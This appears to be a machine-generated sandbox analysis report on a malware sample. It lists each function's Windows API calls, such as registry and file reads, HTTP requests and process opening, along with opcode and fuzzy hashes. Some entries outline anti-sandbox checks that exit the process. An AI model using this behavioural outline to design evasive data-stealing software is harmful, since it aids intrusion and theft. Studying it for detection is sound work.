                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 8b82d21a309deabf923617906f43a4d6908d549bbeb0593eff0400d478c0aafe
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: 6F012CB9A80204BBEB00DBE0ED89FADB7B9EB48701F005154FA059A290D674A900CB51
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                        • RegOpenKeyExA.ADVAPI32(80000002,02EB3900,00000000,00020119,004176B9), ref: 0041775B
                                                        • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                        • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: CurrentBuildNumber
                                                        • API String ID: 3466090806-1022791448
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                        APIs
                                                        • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                        • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID: :A$:A
                                                        • API String ID: 1378416451-1974578005
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02CF75A1
                                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02CF7618
                                                        • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02CF7674
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 02CF76B9
                                                        • HeapFree.KERNEL32(00000000), ref: 02CF76C0
                                                          • Part of subcall function 02CF94A7: vsprintf_s.MSVCRT ref: 02CF94C2
                                                        • task.LIBCPMTD ref: 02CF77BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                        • String ID:
                                                        • API String ID: 700816787-0
                                                        • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction ID: f1cbf4b3c6df82750dd2c7bf6dc5b14d88c9ad1991180b9ca4fe9ea8bd677c14
                                                        • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction Fuzzy Hash: F8611CB59102689BDBA5DF50CC44FE9B7B9BF48304F0081E9E649A6140DBB06BC9CFA4
                                                        APIs
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02CF6548
                                                          • Part of subcall function 02CF64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 02CF656A
                                                          • Part of subcall function 02CF64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02CF659C
                                                          • Part of subcall function 02CF64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02CF65EC
                                                          • Part of subcall function 02CF64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02CF6626
                                                          • Part of subcall function 02CF64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02CF6638
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D0557F
                                                        • lstrlen.KERNEL32(00000000), ref: 02D05596
                                                          • Part of subcall function 02D09097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D090B9
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 02D055CB
                                                        • lstrlen.KERNEL32(00000000), ref: 02D055EA
                                                        • strtok.MSVCRT(00000000,?), ref: 02D05605
                                                        • lstrlen.KERNEL32(00000000), ref: 02D05615
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID:
                                                        • API String ID: 3532888709-0
                                                        • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction ID: 2e331e3f850775ceaa3c1c765aca5f5f609795ec331cd1ddf7364f4db93b0764
                                                        • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction Fuzzy Hash: DC51B5759102489BCB18EFA5DAD5BED7776EF20304F90401CEA0A666E0EB346F45CF61
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02D07345
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,02D07574,004205BD), ref: 02D07383
                                                        • memset.MSVCRT ref: 02D073D1
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02D07525
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID:
                                                        • API String ID: 224852652-0
                                                        • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction ID: b8c905806c1c775f50296fecdac0324c144990fa79185c42056a299deb9d474a
                                                        • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction Fuzzy Hash: 76515EB1D002189BEB14EBA0DCC4BEDB775EF44305F5041A9E215AB2D1EB746E84CF68
                                                        APIs
                                                        • memset.MSVCRT ref: 004140D5
                                                        • RegOpenKeyExA.ADVAPI32(80000001,02EBA448,00000000,00020119,?), ref: 004140F4
                                                        • RegQueryValueExA.ADVAPI32(?,02EB9F08,00000000,00000000,00000000,000000FF), ref: 00414118
                                                        • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                        • lstrcatA.KERNEL32(?,02EB9F80), ref: 0041415B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                        • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                        APIs
                                                        • memset.MSVCRT ref: 02D0433C
                                                        • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 02D0435B
                                                        • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 02D0437F
                                                        • RegCloseKey.ADVAPI32(?), ref: 02D04389
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D043AE
                                                        • lstrcat.KERNEL32(?,0064A168), ref: 02D043C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction ID: d61b88d9b78376cae7f75f37419f052eb95192607c40a17c5a6050fb5921f561
                                                        • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction Fuzzy Hash: 784184BA940108BBDB14EBE0DC85FEE737AAB49300F044559A719571D0EAB55B88CFE2
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00413588
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • strtok_s.MSVCRT ref: 004136D1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpystrtok_s$lstrlen
                                                        • String ID:
                                                        • API String ID: 3184129880-0
                                                        • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                        • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                        APIs
                                                        • __lock.LIBCMT ref: 0041B39A
                                                          • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                          • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                          • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                        • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                          • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                        • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2005412495-0
                                                        • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                        • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                        APIs
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D09B08
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D09B21
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D09B39
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D09B51
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D09B6A
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D09B82
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D09B9A
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D09BB3
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D09BCB
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D09BE3
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D09BFC
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D09C14
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D09C2C
                                                          • Part of subcall function 02D09AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D09C45
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02CF1437: ExitProcess.KERNEL32 ref: 02CF1478
                                                          • Part of subcall function 02CF13C7: GetSystemInfo.KERNEL32(?), ref: 02CF13D1
                                                          • Part of subcall function 02CF13C7: ExitProcess.KERNEL32 ref: 02CF13E5
                                                          • Part of subcall function 02CF1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02CF1392
                                                          • Part of subcall function 02CF1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02CF1399
                                                          • Part of subcall function 02CF1377: ExitProcess.KERNEL32 ref: 02CF13AA
                                                          • Part of subcall function 02CF1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02CF14A5
                                                          • Part of subcall function 02CF1487: __aulldiv.LIBCMT ref: 02CF14BF
                                                          • Part of subcall function 02CF1487: __aulldiv.LIBCMT ref: 02CF14CD
                                                          • Part of subcall function 02CF1487: ExitProcess.KERNEL32 ref: 02CF14FB
                                                          • Part of subcall function 02D069D7: GetUserDefaultLangID.KERNEL32 ref: 02D069DB
                                                          • Part of subcall function 02CF13F7: ExitProcess.KERNEL32 ref: 02CF142D
                                                          • Part of subcall function 02D07AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02CF141E), ref: 02D07AE7
                                                          • Part of subcall function 02D07AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D07AEE
                                                          • Part of subcall function 02D07AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02D07B06
                                                          • Part of subcall function 02D07B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D07B77
                                                          • Part of subcall function 02D07B47: RtlAllocateHeap.NTDLL(00000000), ref: 02D07B7E
                                                          • Part of subcall function 02D07B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02D07B96
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D06D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D06D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 02D06D60
                                                        • Sleep.KERNEL32(00001770), ref: 02D06D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D06D81
                                                        • ExitProcess.KERNEL32 ref: 02D06D89
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2525456742-0
                                                        • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction ID: 552ee4b2f5d47cc28ba6cfe012e8f879f7e8ab971808dd2c52a042f940022d76
                                                        • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction Fuzzy Hash: 8C311675A44308AADB04FBE0DC94BED777AEF15300F540519A602A62E0EFB4AE04CE76
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                        • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                        • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02CF9C53
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02CF9C78
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 02CF9C98
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,02CF16F6,00000000), ref: 02CF9CC1
                                                        • LocalFree.KERNEL32(02CF16F6), ref: 02CF9CF7
                                                        • CloseHandle.KERNEL32(000000FF), ref: 02CF9D01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction ID: fe7240ed95fff95fe875cdd9c6d6ac5710b2585d3bf10b2de005beabe440a6b5
                                                        • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction Fuzzy Hash: 2031F6B8A00209EFDF54CF94C885BEE77F5FB89304F108158EA15A7290C774AA45CFA1
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C9EA
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __amsg_exit.LIBCMT ref: 0041CA0A
                                                        • __lock.LIBCMT ref: 0041CA1A
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                        • free.MSVCRT ref: 0041CA4A
                                                        • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                        • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                        APIs
